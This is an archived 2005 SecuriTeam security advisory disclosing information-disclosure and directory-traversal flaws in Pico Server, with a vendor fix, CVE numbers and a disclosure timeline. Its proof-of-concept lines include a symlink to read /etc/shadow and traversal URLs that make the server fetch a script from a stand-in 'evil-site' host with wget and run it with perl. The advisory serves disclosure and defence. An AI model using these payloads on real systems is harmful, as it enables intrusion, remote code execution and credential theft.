Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[UNIX] Pico Server Multiple Vulnerabilities (Information Disclosure, Dir

from [SecuriTeam] Network Security [Permanent Link]
Subject: [UNIX] Pico Server Multiple Vulnerabilities (Information Disclosure, Directory Traversal)
Date: 17 May 2005 11:22:00 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Pico Server Multiple Vulnerabilities (Information Disclosure, Directory 
Traversal)
------------------------------------------------------------------------


SUMMARY

" <http://pserv.sourceforge.net/> Pico Server (pServ) is written in 
portable C (K&R style so it can compile on older compilers too) and sports 
several options that by means of #define statements can customize the 
behavior, the performance and the feature set so to be able to fit better 
the the requisites."

Information Disclosure vulnerabilities where found in Pico server that 
allow attackers to retrieve information from the local computer. A 
directory traversal vulnerability found in the Pico server allows 
attackers to execute arbitrary code.

DETAILS

Vulnerable Systems:
 * Pico Server version 3.2 and prior (Vulnerable to all vulnerabilities)
 * Pico Server version 3.3 (Vulnerable to local information disclosure)

Immune Systems:
 * Pico Server version 3.3 (Immune to remote information disclosure and 
directory traversal)

Local Information Disclosure:
pServ does not distinguish between normal files and from symbolic-links. 
Unfortunately it only check the link itself but not check if the 
symbolic-link target is still in the web-root. That is why an attacker 
with access to a directory on the web server (e.g. via FTP) can place a 
symbolic link to any file on the server. The attacker can then retrieve 
that file (if pServe have the permission to read it) through the web 
server by navigating his browser to that link.

Proof of Concept
Retrieving /etc/shadow if pServe runs as root:
 1. As user go to your web-directory e.g.: cd /usr/local/var/www/userdir
 2. Create a link to /etc/shadow: ln -s /etc/shadow
 3. Retrieve the shadow file by pointing your browser to 
http://vuln-host:2000/userdir/shadow

Workaround
pServe should run as a user with minimal privileges. Files that should not 
be read by unprivileged users should have their permissions set 
accordingly.

Remote Information Disclosure:
pServ has CGI-BIN support. Only URLs beginning with "cgi-bin" are treated 
as cgi-scripts. The server does not check correctly whether a user 
accesses a file in cgi-bin and gives away the source instead of executing 
it.

The server only checks, whether a file is in cgi-bin by checking whether 
the beginning of the directory part of the URL matches "cgi-bin". A user 
can circumvent this by asking for /somedir/../cgi-bin/ and therefore is 
able to retrieve the complete source-code of all scripts in cgi-bin.

Proof of Concept:
This URL lets us download the source of test.pl instead of executing it.
http://vuln-host:2000/somedir/../cgi-bin/test.pl

Vendor Status:
The developers have released version 3.3. This version should fix the 
problem.

Directory Traversal:
Only if pServ is compiled with support for CGI-BIN a remote attacker is 
able to execute any program (with pServ permissions) on the server by 
traversing out of the cgi-bin directory.

The CGI-BIN support is searching in the URL for the directory  cgi-bin  
and if it found, the script are treated as CGI scripts.

To avoid that a user traverses out of the cgi-bin using traditional /../, 
pServ parses the requested URL. It increases a counter by one if it parses 
a / (new subdirectory) and decreases the counter if it parses /../. If the 
counter goes below zero the URL is rejected as illegal. Unfortunately an 
attacker can avoid being rejected, just by using enough / in the URL 
(without directory names between them), so he can traverse out of the 
cgi-bin by adding some /../ . This allow the attacker execute any program 
on the server (with pServ permissions).

Proof of Concept:
The following url downloads a script (or executable) to the server:
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q 
+http://evil-site/evil.pl/+-O+/tmp/evil.pl

This is how the script can be executed afterwards:
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl

Vendor Status:
The developers have released version 3.3. This version should fix the 
problem.

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1365> 
CAN-2005-1365
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1366> 
CAN-2005-1366
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1367> 
CAN-2005-1367

Disclosure Timeline:
2005-04-29 Vulnerabilities found
2005-05-02 First attempt to inform developers. CAN-number assigned
2005-05-04 Second attempt to inform developers
2005-05-16 New version released two vulnerabilities was fixed (Remote 
Information discloser and Directory Traversal) One Vulnerability was not 
fixed (Local Information Discloser). Advisory published


ADDITIONAL INFORMATION

The information has been provided by  <mailto:bugtraq@clausrfoverbeck.de> 
Claus R. F. Overbeck.
The original article can be found at:  
<http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-010> 
http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-010,  
<http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-011> 
http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-011 and  
<http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-012> 
http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-012



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] Pico Server Multiple Vulnerabilities (Information Disclosure, Directory Traversal), SecuriTeam <=
Previous by Date:  [UNIX] Linux Kernel pktcdvd and rawdevice ioctl Race Condition, SecuriTeam
Next by Date:  [EXPL] Mac OS X / Adobe Version Cue Local Root (Exploit), SecuriTeam
Previous by Thread:  [UNIX] Linux Kernel pktcdvd and rawdevice ioctl Race Condition, SecuriTeam
Next by Thread:  [EXPL] Mac OS X / Adobe Version Cue Local Root (Exploit), SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]